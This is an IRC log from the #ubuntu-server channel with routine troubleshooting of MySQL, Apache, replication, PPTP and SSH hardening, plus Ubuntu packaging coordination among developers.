<LucidGuy> ppetraki, I can't, this filesystem has been plagued by xfs/nfs instability for years.  Its an NFS server exporting my users home dirs.  I gave up awhile back and picked up a new server with a newer version of the OS, transferred the data, setup nfs etc .. and now this server is unstable. grrrrrrrr
<ppetraki> LucidGuy, so you still have the old server around to reproduce the issue with?
<LucidGuy> ppetraki, the old is in production doing something else.  I was never able to reproduce the issue
<LucidGuy> performed numerous xfs_repairs ..
<LucidGuy> so annoying
<LucidGuy> shit .. have to run.
<weeb1e> Anyone know how I can purge mysql from a system if it still says 'Unable to set password for the MySQL "root" user' when attempting to install it?
<weeb1e> I have tried a few times now, and the following is not sufficient to fix this issue: apt-get -f install;  apt-get remove --purge mysql-server mysql-client mysql-common libdbd-mysql-perl libmysqlclient18:amd64 mysql-client-5.5 mysql-client-core-5.5 mysql-common mysql-server-core-5.5; apt-get autoremove; apt-get autoclean; rm -rf /var/lib/mysql
<LucidGuy> ppetraki, any other ideas?
<ppetraki> LucidGuy, play with your dirty pages ratio http://www.cyberciti.biz/faq/linux-kernel-tuning-virtual-memory-subsystem/
<ppetraki> LucidGuy, basically keep everything in ram as much as possible
<ppetraki> LucidGuy, and I hope you have a RAID with a WB cache because individual drives are going to be stupid wrt caching
<weeb1e> I finally found a solution, after so many "solutions" which did not help at all. If anyone ever has that issue, you need to use: echo "exit 0" >> /etc/init.d/mysql; dpkg --configure -a; dpkg --configure -a
<weeb1e> Or not, it's still broken
<weeb1e> Wow, if I had physical access I would have formatted the box by now
<lordievader> weeb1e: What is exactly the problem?
<weeb1e> It's a brand new box, which I just started installing base dependencies on, the mysql install failed half way through due to a typo in the repeated password, combined with stdin being piped to /dev/null
<weeb1e> Now everytime I try to install mysql, it says 'Unable to set password for the MySQL "root" user'
<weeb1e> No matter what I do, I cannot purge the system of whatever is storing the bad state
<lordievader> weeb1e: sudo dpkg-reconfigure mysql-server
<weeb1e> lordievader: dpkg-reconfigure: mysql-server is broken or not fully installed
<teward> weeb1e, sudo apt-get purge mysql-server; sudo apt-get install mysql-server
<teward> assuming it's never been cofnigured with data *maybe* purging the cnfigs with the remove would work
<weeb1e> teward: Please read up slightly, to where I showed everything I tried to purge
<teward> weeb1e, there's nothing for me to read up on, client doesn't have scrollbac
<weeb1e>  apt-get -f install;  apt-get remove --purge mysql-server mysql-client mysql-common libdbd-mysql-perl libmysqlclient18:amd64 mysql-client-5.5 mysql-client-core-5.5 mysql-common mysql-server-core-5.5; apt-get autoremove; apt-get autoclean; rm -rf /var/lib/mysql
<weeb1e> That is not sufficient to fix this
<hallyn> zul: ok so hold back on that libvirt, bc it most definately breaks qrt.
<zul> okie dokie
<hallyn> could be just a mismatch of bindings to libvirt, still not sure
<hallyn> man am i gonna have to bisect?  with libvirt?
<lordievader> weeb1e: Still, run what teward said.
<teward> weeb1e, or if you really want to mess around with it, use dpkg instead of apt to purge those packages (suggestion based on http://askubuntu.com/questions/253023/unable-to-set-password-for-the-mysql-root-user)
<weeb1e> Sorry, I think I forgot "apt-get purge" from that list of commands I tried, I tried that too, and now tried it again, and it definitely does not help
<weeb1e> teward: I really don't have a choice but to "mess around with it"
<weeb1e> mysql is one of a ton of dependencies I need to install
<weeb1e> teward: I have tried 10 different "solutions" to that error
<weeb1e> None of which work
<weeb1e> I've searched the hard drive for anything with mysql in its name too
<weeb1e> I am completely out of ideas here
<weeb1e> Like I said, at this point, it would be faster to format and reinstall ubuntu, but I don't have physical access
<weeb1e> I can't believe, that of all things, installing mysql is causing an issue
<lordievader> weeb1e: Could you pastebin the full output of "sudo dpkg-reconfigure mysql-server-core-5.5"?
<weeb1e> lordievader: I already pasted it to you
<weeb1e> That was it
<weeb1e> The full output, there is nothing else
<lordievader> weeb1e: Hmm, "sudo apt-get purge mysql-server mysql-server-5.5 mysql-server-core-5.5"
<weeb1e> lordievader: I just tried running "apt-get purge" on that full list of mysql-related packages I mentioned above and still no change
<lordievader> weeb1e: Compare the list I gave with yours. Mysql-server-5.5 was missing from yours ;)
<hallyn> hm, maybe i'ts just this umask buglet
<weeb1e> lordievader: Just tried again with that versioned package (which I assume mysql-server resolves to anyway), no change
<lordievader> weeb1e: Are they all purged?
<weeb1e> `dpkg --get-selections | grep mysql` outputs nothing, so I assume so
<lordievader> weeb1e: Ok, navigate to /var/cache/apt/archives, locate mysql-server-core-5.5 and install that using dpkg. And please pastebin the full output.
<weeb1e> lordievader: No errors from `dpkg -i mysql-server-core-5.5_5.5.38-0ubuntu0.14.04.1_amd64.deb`
<weeb1e> lordievader: http://pastebin.com/AtccZNXL
<lordievader> weeb1e: Ok, next step do the same for mysql-server-5.5
<weeb1e> lordievader: mysql-server-5.5 pre-depends on mysql-common
<lordievader> weeb1e: Install that one first then.
<weeb1e> lordievader: Same password error, console output: http://pastebin.com/3uLd4E9f
<lordievader> weeb1e: Where do you see a password error? I see that mysql-client-5.5 is not installed: sudo apt-get install -f
<weeb1e> lordievader: On the ncurses mysql installer UI
<lordievader> weeb1e: You do get the option of setting a password?
<weeb1e> Yes, after the second repeated entry of the password, it goes back to console for a split second and then returns to the mysql installer screen with the error message
<weeb1e> Unable to set password for the MySQL "root" user
<lordievader> weeb1e: So you enter the password twice?
<weeb1e> Yes
<lordievader> weeb1e: Does the mysql error log state anything?
<Elia> hi
<weeb1e> lordievader: http://pastebin.com/GmwmQPRg
<IanMalcolm> hey guys, is the spamassassin corpus (https://spamassassin.apache.org/publiccorpus/) the best corpus to train my dspam?
<IanMalcolm> I'm also looking for ham / spam corpus in Portuguese. Is there such a thing?
<lordievader> weeb1e: As I figured you have the same error "Can't create/write to file '/tmp/#sql_5e7d_0.MYI'"
<lordievader> weeb1e: See the answer of green7: http://askubuntu.com/questions/253023/unable-to-set-password-for-the-mysql-root-user
<weeb1e> lordievader: I tried that hours ago, but let me give it another go, in case I missed something
<weeb1e> Oh wait, green7, I missed that answer completely
<weeb1e> lordievader: That does indeed seem to have solved it, even if I looked at the mysql log sooner, I would never have imagined that /tmp's permissions were messed up
<weeb1e> I'd love to know what they did to this clean install, before handing the box over to me :(
<streulma> this is the second time I setup a 14.04 server at hosting provider from self build image.
<streulma> 20gb / 79GB /srv 1gb swap /usr mounted on /srv/usr and var also
<streulma> there is a script while backing up that removes all tars zips and gzs
<Pici> streulma: is there a question in there?
<streulma> no just to let you know
<streulma> or
<streulma> yes
<streulma> how can avoid this that tars and zips are removed ?
<streulma> all data is on srv
<streulma> so backed up to home :)
<ikonia> ??
<streulma> what ikonia ?
<ikonia> I don't understand what your question is
<Pici> Stop doing whatever you are doing that is removing the tars and zips.
<miceiken> How do I remove password of a user, and make sure they can't be used remotely?
<TJ-> miceiken: "man passwd" see "--delete"
<bananapie> I have a variable A that contains the value 'COUNT', I want to set the variable $COUNT to 5. I tried $$A=5, but it doesn't work.
<bananapie> Can I do this ?
<sarnold> bananapie: it depends upon the language you're using
<bananapie> bash*
<sarnold> bananapie: and that sounds like a terrifying thing to do :)
<sarnold> bananapie: try ${${A}}=5
<bananapie> I am writing a link monitoring script, and I want to use bash functions. I can't pass variables by reference
<bananapie> it's telling me that it's bad substition
<sarnold> bananapie: try: B=${A} ; ${B}=5 ?
<bananapie> yea, I tried that. Trouble is, it tries to execute the value of ${B}.
<bananapie> If there is no obvious way to do it, I am probably doing this wrong, so I'll try something else.
<bananapie> tahnks
<bananapie> ok, I have to use eval :(
#ubuntu-server 2014-09-06
<ompal99> hi
<ompal99> command to know remote machine is VM or Physical
<Patrickdk> virtwhat
<ompal99> thanks
<cfhowlett> man virtwhat
<ompal99> virtwhat
<ompal99> not working
<Patrickdk> virt-what
<ompal99> im trying on live centos image
<Patrickdk> well, this is 3ubuntu
<Patrickdk> can't help you with centos
<ompal99> ok
<ompal99> thanks man
<ompal99> working
<ompal99> thakns
<Abhijit> i have 8 disks. sda to sdh. i want 200MB, , 20GB and <remaining_space> these 3 partitions on *each* disk. then i want to create md0 for all eight 200mb partions. mount /boot on md0. then creaet md1 for all eight 20GB partitions. mount / on it. is this the correct kickstart recipe for this raid1 setup http://paste.fedoraproject.org/131210/99128401/
<delinquentme> The following exception was thrown by libcloud when trying to run the initial deployment: 413 Request Entity Too Large Quota exceeded for ram: Requested 8192, but already used 130048 of 131072 ram
<hadifarnoud> nginx is loading a totally different site despite the fact that the config is set on the correct folder. ideas?
<sarnold> are you sure it's loading the correct config?
<lordievader> Good morning.
<Abhijit> anyone using mysql master ha.
<bekks> Abhijit: What if someone does?
<Abhijit> bekks, how can i make it use user@ipaddress instead of user@hostname?
<bekks> Make it use that when doing what?
<Abhijit> bekks, connecting to mysql nodes?
<bekks> When configuring it, use IP instead of hostname.
<Abhijit> bekks, did that exactly.
<bekks> Then it wouldnt use the hostnames, unless you have entries for them in the /etc/hosts I guess.
<Abhijit> bekks, you mean /etc/hosts of the node or manager?
<bekks> Abhijit: of the manager.
<Abhijit> bekks, manager only has host entry for itself. not for the nodes.
<bekks> Abhijit: So lets take a look at another aspect - does replication currently work?
<Abhijit> bekks, its this file /usr/bin/apply_diff_relay_logs
<Abhijit> bekks, yes.
<bekks> Abhijit: So why do you want to use the IP then? Replication works thats what mysql master ha is supposed to do?
<Abhijit> bekks, replication do not work with mysql master ha. it halts at this error
<bekks> Abhijit: You ansered yes and no to my question "does replication currently work?" - Does it work or not?
<bekks> *answered
<Abhijit> no
<Abhijit> it does not work.
<bekks> And whats the exact error? Pastebin it please.
<Abhijit> bekks, http://paste.fedoraproject.org/131486/09997161/
<Abhijit> bekks, any idea?
<Abhijit> bekks, i get this Last_IO_Error: Got fatal error 1236 from master when reading data from binary log: 'log event entry exceeded max_allowed_packet; Increase max_allowed_packet on master'
<Abhijit> when i do  show slave status\G
<Abhijit> and Slave_IO_State is empty
<bekks> Then do what the error says and change that given parameter on the master side.
<Abhijit> yeah.
<Abhijit> bekks, how much to set? i set it to 500M and still get same error.
<bekks> So 500M is too small.
<Abhijit> beisner, 1024M. still same errror.
<Abhijit> bekks, ^
<bekks> Did you restart the master database after changing the value?
<Abhijit> yes.
<bekks> Then its still too small.
<Abhijit> bekks, i am adding this to /etc/my.cnf. is there any way that mysql is using this conf only an not something else?
<bekks> Sure there is, but as long as it is a standard setup, that file is used.
<Abhijit> ok
<darkxploit> hello i need the documentation for dnssec on ubuntu server 14.04 LTS . can someone help me please with some links ?
<darkxploit> hello i need the documentation of bind package for ubuntu?..
<andol> darkxploit: Well, if you install the bind9-doc packages you'll find the documentation under /usr/share/doc/bind9-doc/arm/
<andol> darkxploit: For getting started with dnssec I can very much recommend this book - https://www.michaelwlucas.com/nonfiction/dnssec-mastery
<darkxploit> andol, ok thank you
<dustinspringman> so, i'm still having an issue... ubuntu-server 14.04... acting as a pptp server.... whenever a pptp client disconnects, I get a "PPPD" command in TOP that runs on and on forever consuming 100% CPU.... as more and more clients disconnect, the PPPD command in top grows and each of the processes equally consumes CPU until the server is at 100%... I can simply "kill" the offending pppd processes, but thats a manual proces
<Arshan> hi every one
<qman__> dustinspringman: while this doesn't directly address your issue, PPTP is laughably, horribly broken and insecure - you really shouldn't be using it   http://en.wikipedia.org/wiki/Point-to-Point_Tunneling_Protocol#Security http://security.stackexchange.com/questions/29460/how-can-i-tell-if-a-pptp-tunnel-is-secure
<dustinspringman> thanks qman__ I am familiar with these issues.. unfortunately, the customer had already invested in hardware that lacks the software license to support ipsec.. so I'm stuck until the next budget cycle..
#ubuntu-server 2014-09-07
<pmatulis> dustinspringman: the hints provided didn't yield any useful results?
<dustinspringman> pmatulis: Still haven't been able to track it down... I'm thinking its a script running when a client d'conns.. like maybe in the /etc/ppp/if-down (maybe)...
<dustinspringman> something is happening only when a user drops.. it causes a process to run and that process will continue forever if allowed..
<Pupeno> What would be the appropriate place to define an environment variable system-wide?
<arc__> Hello
<arc__> i am some problems with apache2 on ubuntu server 12.04 i keep on getting "404 Not Found"
<lordievader> o/
<lordievader> arc__: What does your apache error log say about that?
<arc__> i dont know how to access the logs ("I feel ashamed")
<arc__> FYI i can access phpmyadmin
<arc__> but i cant see the default index.html page
<RoyK> arc__: /var/log/apache2/
<RoyK> arc__: the logs are there
<RoyK> 404 means the file doesn't exist
<arc__> ahh ok ty Roy
<lordievader> arc__: You are probably using a vhost that is wrongly configured.
<arc__> ok
<arc__> i am using a shared ip
<arc__> i have a 100 ports
<arc__> which logs do you want to see ?
<lordievader> arc__: Do you use multiple vhosts?
<arc__> no i have just set this up on a vps
<lordievader> arc__: Allright, are you getting the 404 on the root of the website?
<arc__> wait i found something in the logs
<arc__> it says  "File does not exist: /etc/apache2/htdocs"
<arc__> does that help ?
<arc__> yea its on the root of the site
<lordievader> arc__: Does the default site happen to point to that directory?
<arc__> i dont think so
<lordievader> With default site I mean /etc/apache2/sites-available/000-default.conf
<arc__> -bash: cd: /etc/apache2/htdocs/: No such file or directory
<lordievader> Does that vhost definition point to a valid document-root?
<RoyK> arc__: there shouldn't be any htdocs under /etc/apache2
<RoyK> arc__: web data belongs under /var/www somewhere
<RoyK> not in /etc
<arc__> here is the file http://paste.ubuntu.com/8279932/
<arc__> pwd
<arc__> wrong window :)
<lordievader> arc__: does "grep htdocs /etc/apache2/sites-available" return anything?
<arc__> let me try
<arc__> nope
<lordievader> arc__: How about "grep htdocs /etc/apache2/conf-available"?
<arc__>  grep: /etc/apache2/conf-available: No such file or directory
<RoyK> lordievader: grep -r
<lordievader> Ah, right: grep -r /etc/apache2
<arc__> so i need to grep -r ?
<lordievader> arc__: Yes: grep -r /etc/apache2
<arc__> ok
<arc__> its doing something :)
<lordievader> Please pastebin the full output from that command.
<arc__> kk
<arc__> i think its froze or something
<arc__> i will give it time
<RoyK> arc__: grep -r /etc/apache2 will wait for input - try grep -r htdocs /etc/apache2
<RoyK> arc__: just press ctrl+c on that grep thing
<arc__> kk
<arc__> nope nothing returned
<lordievader> Err right, forgot that part. Sorry.
<arc__> np
<lordievader> Hmm, then I wonder why it errors with /etc/apache2/htdocs. In /var/log/apache2/access.log what does the 404 line read?
<arc__> it must be getting that dir from somewhere
<arc__> i havent changed anyting expecpt the ports.conf
<arc__> why is it trying to goto htdocs
<lordievader> arc__: That's what we are trying to figure out ;)
<arc__> sorry i am just mind blow aswell :)
<arc__> blown*
<RoyK> arc__: reinstall - you probably changed something and forgot about it
<arc__> i just installed it 10 mins ago
<arc__> and i only changed the ports
<arc__> i was on debain and the same thing happened so i installed 12.04
<arc__> this is as fresh as it gets
<lordievader> arc__: I'd still like to see the 404 line from your access log ;)
<arc__> the access logs are blank
<arc__> there is nothing inside of that log
<arc__> is that wired
<lordievader> arc__: That is not supposed to be.
<arc__> ahh ok
<lordievader> arc__: Jup I'm starting to think there is something definitely wrong with your config.
<arc__> ok i will install ubuntu 13.10 and you can take me step by step so you know what i have done
<lordievader> Why 13.10? Rather install 14.04.
<lordievader> 13.10 is EOL.
<arc__> there is no choise for it in the vps os menu
<arc__> it goes from 9 to 13.10
<arc__> i can reinstall 12.04
<lordievader> arc__: Hmm... first purge apache2, make sure all the config is gone. And then reinstall apache.
<arc__> i have just reinstalled 12.04
<arc__> start fresh
<arc__> goto wait 2 mins while it installs
<zubairahmed> DocumentRoot /var/www/ ??
<arc__> ok i have installed a fresh copy of 12.05
<arc__> 12.04 :)
<arc__> now i need to install apache 2 mysql and phpmyadmin
<arc__> can you take me throught this
<zubairahmed> use tasksel
<zubairahmed> use tasksel arc__
<lordievader> arc__: We'll do one at a time: sudo apt-get install apache2
<arc__> kk
<arc__> k done
<arc__> i need to config my ports
<lordievader> arc__: Ok, what do you get when you go to the server's ip address?
<arc__> i need to change the port first
<arc__> as its a shared ip
<lordievader> arc__: Don't forget the vhost.
<arc__> ok how do i change the ports
<lordievader> arc__: Open /etc/apache2/ports.conf and edit what you need.
<arc__> ok
<lordievader> Then open /etc/apache2/sites-available/000-default.conf to reflect that change.
<arc__> dont you mean default.conf not 000-default.conf
<lordievader> arc__: Ah, right Precise still has 2.2
<lordievader> Yes that's the one.
<arc__> kk what do i change here ?
<arc__> as i have change the ports in ports.conf
<lordievader> arc__: The line "<VirtualHost *:80>"
<arc__> ok do i change that to my new port ?
<lordievader> arc__: Yes.
<arc__> ok
<arc__> ok thats done
<arc__> do i restart apache2 now ?
<lordievader> arc__: Restart apache2 and go to the servers ip.
<arc__> kk
<arc__> it works ! yay http://starknw.fr:34780/
<arc__> thanks lorkievader
<arc__> [Sun Sep 07 18:16:22 2014] [warn] NameVirtualHost *:80 has no VirtualHosts
<arc__> is that normal ?
<lordievader> arc__: Do you have another vhost definition (or is that line present in default.conf)?
<arc__> ahh ok i forgot to change it in ports.cinf
<arc__> conf*
<arc__> i have changed it and restarted apache and i dont get the error
<arc__> now how do install phpmyadmin and mysql,  lord ?
<lordievader> arc__: Same way ;)
<arc__> kk
<arc__> lol
<_1_Jenning> du
<teward_> is there a way to configure ubuntu server to prever v4 over v6 as preferred protocol?
<teward_> such that things bind to v4 before they bind to v6?
<geb_> part
<zermanno> Hi, how do i change the locale on ubuntu server 14.04?
<gebassetti> part
#ubuntu-server 2015-08-31
<Daemoen> lo all;  anyone else here ever had to install openntpd as their daemon to use unprivileged ports?  in a situation where i cannot use normal ntpd (privilege port issue), where our cloud provider blocks priv port ntp traffic;  openntpd uses nonpriv traffic, so it works;  but it does not seem to have ntpq or any of the other trouble or status tools than the daemon itself,  to further complicate matters, openntpd and ntpd packages
<Daemoen> conflict, so trying to find a way of getting the ntp status tools installed to monitor (besides tailing syslog)
<RoyK> blocking NTP traffic is just outright stupid
<patdk-lap> royk only somewhat
<patdk-lap> too many people running open ntp server that are vaunerable
<patdk-lap> remember the record breaking ddos traffic takedowns a year or so ago? cause of ntp
<RoyK> patdk-lap: I (naÃ¯vely?) thought people were updating their servers somewhat regularly ;)
<patdk-lap> once every 5 years?
<RoyK> well, there was a DNS breakin in bind4 some 15 years back, so we should block DNS!
<patdk-lap> well, dns is also horrible
<RoyK> yeah, I stick to /etc/hosts
<RevertToType> so on 15.04 where would i put/what would i do to make a script run @ login (as in after all other stuff is done) is that still a systemd thing or is it something else?
<RoyK> RevertToType: http://www.howtogeek.com/104708/how-to-customize-ubuntus-message-of-the-day/ <-- this might help
<RevertToType> nah that just fires off a single message...
<pmatulis> RevertToType: in one of your shell's init files or via PAM perhaps
<RevertToType> think ~/.bash_login will work... mebbe
<RoyK> RevertToType: it can run a script too, you know ;)
<RevertToType> it's been a long week :P
<lordievader> Good morning.
<jak2000> when i try: apt-get update i get this error, how to fix? "E: Unable to synchronize mmap - msync (5: Input/output error)"
<lordievader> Sounds like a harddrive failing.
<jak2000> mmm but how to fix?
<lordievader> jak2000: First run smartctl -a on all disks to confirm. Then replace the faulty disks (if any).
<RoyK> jeadre: may be fs problems too, but start with smartctl -a on the disk where the root resides - no other disks should be touched by apt
<RoyK> that is, not root, /var
<jelly> jak2000: I'd start with "free" and "dmesg" before smartctl
<RoyK> jeadre: little memory shouldn't produce an i/o error, bt then, seems jak2000's not listening anywy
<acmehandle> Is there a way to do an ln -s where it does not show the path?  Only ../../../ for example?
<PryMar56> I fixed my 20s delay in scripts/init-bottom by modifying lib/udev/rules.d/85-lvm2.rules before making ramfs. But I have to restore it afterward
<PryMar56> I remove the vgchange
<PryMar56> is there a way to have a copy of 85-lvm2.rules reserved for ramfs?
<jak2000> how to know if port 4848 is used?
<sarnold> jak2000: netstat -anp | grep :4848
<jak2000> say: tcp6       0      0 :::4848                 :::*                    LISTEN
<sarnold> yup, looks like it is in use
<lordievader> jak2000: Have you checked your disks?
<jak2000> ok, is possible know the program name that use it?
<sarnold> jak2000: the -p option to netstat prints out the program name and pid if you can see the process. run it as root if it might be owned by any users...
<K4k> What tool is used to unlock network accounts on the local system?
<K4k> nevermind -- pam_tally2 --unlock, derp
<sarnold> jamespage,utlemming, 1490361 looks like it should ahve been filed against the cloud-archive version of nova instead of the regular archive version of nova; how should that re-assignment be done? thanks
<|\n> hello, could someone please have a look at this https://pastebin.ovrnet.ru/paste/SRN6fhJu#THs7MiO8 looks same as https://bugs.centos.org/view.php?id=8135 happens often with no real impact, however it doesn't reveal itself on practice yet, any hints appreciated, many thanks!
<prudentmav> in the file /etc/ssh/sshd_config is it possible that for the Port value to be a variable that is pulled from another file?
<pmatulis> prudentmav: you mean having 2 files?
<pmatulis> prudentmav: for context, please provide your use case for not having sshd get its entire configuration from sshd_config
<prudentmav> I know this sounds crazy but this is what I am trying to do, just for the sake of doing it.  I'll create a script on my local machine.  The script will ping 5 different port numbers in a certain order.   This will act as a "combination" that will then unlock my actual ssh port.  The actual port number will be changed on the server using a rotating number similar with what you see on second level verification where the code changes
<prudentmav>  every 30 seconds
<Pici> uhh
<Pici> It does sound crazy.
<teward> s/does sound/is/
<teward> ssh key auth with 2FA is easier to implement lol
<prudentmav> haha
<prudentmav> ok
<prudentmav> this is the kinda crap I think up when I'm bored and too much time on my hands
<teward> prudentmav: to make it work you have to first know the ports.  you then have to set up individual TCP listeners on each port
<teward> you then need to accept specially crafted TCP packets (because general is bad)
<teward> you then need to be able to send back on the last one the 'good' port
<teward> and then accept the connection.
<teward> the simpler method:
<sarnold> prudentmav: I'd be surprised if there's any real benefit to that over standard port knocking
<teward> there isn't, i don't think, sarnold
<prudentmav> I see what you are saying
<teward> the simpler way is to use ssh key authentication, and maybe a secondary 2FA system or some other access controls
<teward> (say, key-auth only, and accept SSH access only from certain sources)
<teward> etc.
<prudentmav> that makes sense
<teward> you also reduce complexity, AND you are using a practice that already exists
<prudentmav> I'll look into secondary 2FA systems
<teward> if it's just you, Duo Security is a third party company, i use them for 2FA on my servers' SSH, but i also have insane lockdowns
<teward> i.e.
<teward> only ONE of my servers actually is reachable from the net.
<sarnold> with ssh specifically you'll get most security enhancements by just forbidding password based auth
<teward> It is the pivot point to other systems.
<teward> and yes, sarnold is right
<teward> forbid password auth
<teward> key auth only :P
<sarnold> other nice things like locking down allowed source ranges are easy enough that they make sense to do if you can do it
<prudentmav> ah that is what I forgot to do.... I only use key but forgot it still has a pass
<sarnold> 2fa is one more step beyond that -- still worth it, but much more work
<teward> sarnold: indeed.
<pmatulis> prudentmav: always go for simplicity. but for us to help further you might want to explain what the ssh connections will be for. you might, for instance, implement SSH chroots if user demands are low
<teward> sarnold: even with Duo Security, gotta compile the pam modules xD
<sarnold> teward: I thuoght we packaged those?
<teward> sarnold: do we package duo security's PAM modules?
<teward> i didn't know it was included in the LTS yet
<teward> :P
<prudentmav> as of now, I am the only person that accesses the server... I've always done everything as root.  But now that my free lance work is starting to grow I am going to bring on another developer that will need ssh access.  and I also need to look into keeping them confined to only one directory
<teward> last i checked there is no Ubuntu package for the pam module from duo security
<sarnold> teward: libpam-duo
<teward> sarnold: i lied, they're there.
<teward> i wanted latest though :P
<sarnold> teward: universe only, but iirc kees also uses it, so probably he'd be on top of issues that need to be fixed
<teward> mmm
<teward> sarnold: indeed.  but nobody at duo security updated their documentation for it xD
<sarnold> hehe
<teward> sarnold: cool, did not know before.
<teward> now I do.
<teward> now put it on the images :P
<teward> loljk
<teward> we haven't even added nginx to tasksel, so we sohuld not touch the images xD
<sarnold> "LNMP stack" just rolls off the tongue doesn't it? :)
<teward> although i'm happy to see that infinity was nice enough to nuke a package that deserved death.  (bitcoin related stuff is evil)
<teward> isn't it LEMP?
<teward> https://en.wikipedia.org/wiki/LAMP_(software_bundle)
<teward> oop lamp
<teward>  LEMP is a version where Apache has been replaced with the more lightweight web server Nginx
<teward> there we go.  same article
<sarnold> "Engine X"? for the E?
<prudentmav> LEMP is being added to tasksel?
<teward> prudentmav: no
<teward> it's not
<teward> sarnold: i think so, and because LEMP looks better than LNMP
<teward> LNMP makes people think of SNMP
<sarnold> and no one likes that
<teward> i need coffee... brb
#ubuntu-server 2015-09-01
<_andy_> Hi there! I'm having issues with my AD DC showing up in the network.
<_andy_> I am able to resolve NetBIOS to an IP address and vice versa, but when searching for computers over the network, the domain controller does not show up.
<_andy_> Hi there! I'm having issues with my active directory domain controller showing up on the list of NetBIOS computer on the network.
<lordievader> Good morning.
<adsc> does ubuntu server automatically use kexec/ksplice technology or do we have to restart after a kernel update?
<lordievader> For the time being you need to restart after a kernel update.
<lordievader> Perhaps with Wily or 16.04 you no longer need to.
<RoyK> adsc: http://www.zdnet.com/article/no-reboot-patching-comes-to-linux-4-0/
<jpds> adsc: You don't HAVE to restart for a kernel upgrade
<RoyK> jpds: well, unless you have hotpatching, you'll still be running the same old kernel code :P
<jpds> RoyK: Well, if the kernel upgrade in question doesn't touch any modules you use...
<adsc> ok, thx...I was just confused because a colleague claimed that after a kernel patch he ran uname -a and it showed the new kernel already
<adsc> which was surprising me, because I set up the system and haven't installed any ksplice or similar technology
<adsc> but I guess he was just wrong, then
<jpds> ksplice wouldn't even change what uname -a shows
<jpds> adsc: You just see a load of "ksplice_*" entries in lsmod
<mufloirc> hi guys
<mufloirc> I'm having an issue with the maas region controller in Ubuntu 14.04 (maas-region-controller 1.8.0+bzr4001). Basically I'm trying to import the boot resouces with this command "sudo maas e4 boot-resources import" but it fails.
<jpds> mufloirc: Tried importing from the web UI?
<mufloirc> no, with the cli
<jpds> mufloirc: Tried importing from the web UI?
<mufloirc> looke like the the signature is not good
<mufloirc> "gpg: Signature made Tue Sep  1 02:46:44 2015 CEST using RSA key ID 476CF100\ngpg: BAD signature from "Ubuntu Cloud Image Builder"
<ivoks> mufloirc: using proxy?
<mufloirc> no, I'm not using proxy
<ivoks> Signature made Tue Sep  1
<ivoks> sounds like today :0
<RoyK> adsc: should work with linux 4.x
<adsc> good to know, thanks
<jpds> mufloirc: Yeah, apparently that broke today, they're working on it
<mufloirc> thanks jpds
<rbasak> utlemming: could you take a look at bug 1489675 please?
<ubottu> bug 1489675 in open-vm-tools (Ubuntu) "open-vm-tools-dkms 2:9.10.2-2822639-1ubuntu3: open-vm-tools kernel module failed to build [error: ânew_sync_readâ undeclared here (not in a function)]" [High,Confirmed] https://launchpad.net/bugs/1489675
<jamespage> morning smb - hows dpdk looking?
<smb> jamespage, lonely
<smb> jamespage, I filed bug 1487538 for ffe but I am not sure I have done the right steps to get MOTUs (or whomever) take notice
<ubottu> bug 1487538 in Ubuntu "[needs-packaging] [FFE] Add dpdk to wily universe" [Wishlist,New] https://launchpad.net/bugs/1487538
<jamespage> smb, does not need a motu - either rbasak or myself can sponsor that
<rbasak> jamespage: well, we're both motus :)
<smb> jamespage, just that rbasak mentioned it needs probably acks before sponsoring
<rbasak> smb, jamespage: my only concern really is that we don't create a future ABI nightmare, so I wanted to get ABI agreement from upstream before uploading.
<rbasak> smb: it needs an FFe ack from a release team member before upload
<rbasak> Sorry I've been slow with getting the upstream communication sorted. My todo list is still too long :(
<rbasak> I'm catching up with maintenance and sponsoring today, then have to get some juju sponsorship done. But we can sync when arges is up maybe.
<jamespage> rbasak, smb: a sync sounds like a good idea
<smb> jamespage, rbasak Yeah. Not sure timewise. Tuesdays are meetingful.
<smb> But maybe we can squeeze something in after either your or our irc meeting
<jamespage> rbasak, fwiw I'm also participating in a thread on the ovs ML re DPDK which is pertinent to this conversation.
<rbasak> jamespage: thanks. We'll sync as soon as we can.
<smb> rbasak, jamespage, would you have time in about 1.25hrs? (for the sync)
<rbasak> smb, jamespage, arges: 1400 UTC? Yes for me. I've sent an invite as a starting point - we can move.
<jamespage> rbasak, +1
<rbasak> smb: on a separate note, who looks after HWE related DKMS issues? I triaged https://bugs.launchpad.net/ubuntu/+source/iscsitarget/+bug/1483415
<ubottu> Launchpad bug 1483415 in iscsitarget (Ubuntu) "iscsitarget-dkms fails to build on 14.04" [Undecided,Confirmed]
<smb> rbasak, jamespage, arges +1 (for meeting)
<smb> rbasak, I might. It a bit of a shared duty
<jamespage> rbasak, urgh - could we bump it 30 mins
<smb> if it is shortened to 30mins as well...
<rbasak> smb: do you know of any testing we do for HWE+DKMS? It seems sub-optimal to me that we have to be reactive on this.
<rbasak> jamespage: I have no objection but looks like +30 minutes would clash for smb and arges
<smb> rbasak, there is testing usually. think something broke for a bit recently
<arges> +30m is fine too. smb we can move our mtg?
<smb> arges, maybe a bit. thought there is other things following up. But potentially we don't need the full hour and can dynamically start
<rbasak> smb, jamespage, arges: OK, moved.
<smb> rbasak, So we checked and that should be fixed in the current update of the hwe kernel (3.19.0-26)
<rbasak> smb: I'm sorry, it isn't hwe at all. He's using Wily.
<rbasak> Err
 * rbasak is very confused
<smb> rbasak, in the bug report its 3.19
<smb> thats not wily
<rbasak> I think I'm looking at the wrong bug
<rbasak> Sorry, triaging too many bugs at once
<rbasak> smb: you're right. Thanks for the comment.
<smb> rbasak, no worries. yw. Its unfortunate the kernel on the iso has that flaw... and people tend to not update
<smoser> rbasak, have you done any thing other than triage https://bugs.launchpad.net/ubuntu/+source/keepalived/+bug/1481337
<ubottu> Launchpad bug 1481337 in keepalived (Ubuntu Vivid) "keepalived makes a floating IP available on more than one host after configuration reload" [Medium,Confirmed]
<samba35> is there any way to change log level for dmesg
<smb> rbasak, OK, let me know how the updated paragraph for dpdk sounds to you
<jamespage> coreycb, is troveclient blocking all of the other openstack packages via heat failing its build/dep8 tests?
<coreycb> jamespage, yes
<coreycb> jamespage, everything should be freed up once the troveclient FFE gets through and we can sync the new version
<jamespage> coreycb, as that's such a blocker, I'd be tempted to sync it without the FFe right now
<jamespage> coreycb, I just found:
<jamespage> http://tarballs.openstack.org/python-troveclient/python-troveclient-master.tar.gz#egg=python-troveclient
<jamespage> in the test-requirements of openstack-trove
<jamespage> urgh
<coreycb> jamespage, yeah.. wasn't sure if I should open a bug on that or what
<coreycb> jamespage, fine by me if we can sync it without an ffe
<jamespage> coreycb, I was trying to see the heat dependency on it - I'm assuming its not expressed correctly upstream
<coreycb> jamespage, I opened a bug for trove's test-requirements.txt
<coreycb> jamespage, shall I go ahead and sync troveclient?
